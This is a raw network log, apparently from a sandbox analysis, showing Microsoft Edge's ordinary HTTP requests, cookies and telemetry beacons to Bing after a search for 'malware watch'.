cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274629.1ad0fb2a
-
GEThttps://www.bing.com/fd/ls/l?BF=MSJ0&IG=69579D85EA2D4E95B5358DAB8D3A2EA2&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}]msedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?BF=MSJ0&IG=69579D85EA2D4E95B5358DAB8D3A2EA2&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274629.1ad0fb40
-
Remote address:88.221.135.16:443RequestPOST /orgid/idtoken/conditional HTTP/2.0
host: www.bing.com
content-length: 693
cache-control: max-age=0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
origin: https://login.microsoftonline.com
upgrade-insecure-requests: 1
dnt: 1
content-type: application/x-www-form-urlencoded
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://login.microsoftonline.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
ResponseHTTP/2.0 200
content-length: 1
content-type: text/html
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 679bf745b5b24a6b9a4f5c15d5265aea
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-v+1vP4/vr2u+lVXHnyoisR4l8z32UKncQekKAM/Q+nE='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: DEBD71B7A8F2463F8D5F3884E095787E Ref B: LON601060106062 Ref C: 2025-01-30T22:03:49Z
date: Thu, 30 Jan 2025 22:03:49 GMT
set-cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D; expires=Tue, 24-Feb-2026 22:03:49 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=250130220349; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:49 GMT; path=/; secure; HttpOnly; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274629.1ad0fb7d
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fdbkans_0%22}]msedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fdbkans_0%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274629.1ad0fbd4
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]msedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274629.1ad0fc07
-
GEThttps://www.bing.com/geolocation/write?isBlocked=true&sid=05DFC6CDCE37668C2381D349CFAB67A5&clientsid=05DFC6CDCE37668C2381D349CFAB67A5msedge.exeRemote address:88.221.135.16:443RequestGET /geolocation/write?isBlocked=true&sid=05DFC6CDCE37668C2381D349CFAB67A5&clientsid=05DFC6CDCE37668C2381D349CFAB67A5 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1738274628
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274629.1ad0fc50
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1738274627668%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22correlationId%22%3A%22679bf743624149b99a0843177321b5f6%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1738274627685%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%22679bf743624149b99a0843177321b5f6%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1738274627685%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1738274627704%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%22%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1738274627704%2C%22Name%22%3A%22ShowBubble%22%2C%22FID%22%3A%22%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627719%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1738274628201%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628223%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1738274627668%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22correlationId%22%3A%22679bf743624149b99a0843177321b5f6%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1738274627685%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%22679bf743624149b99a0843177321b5f6%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1738274627685%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1738274627704%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%22%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1738274627704%2C%22Name%22%3A%22ShowBubble%22%2C%22FID%22%3A%22%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627719%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1738274628201%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628223%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
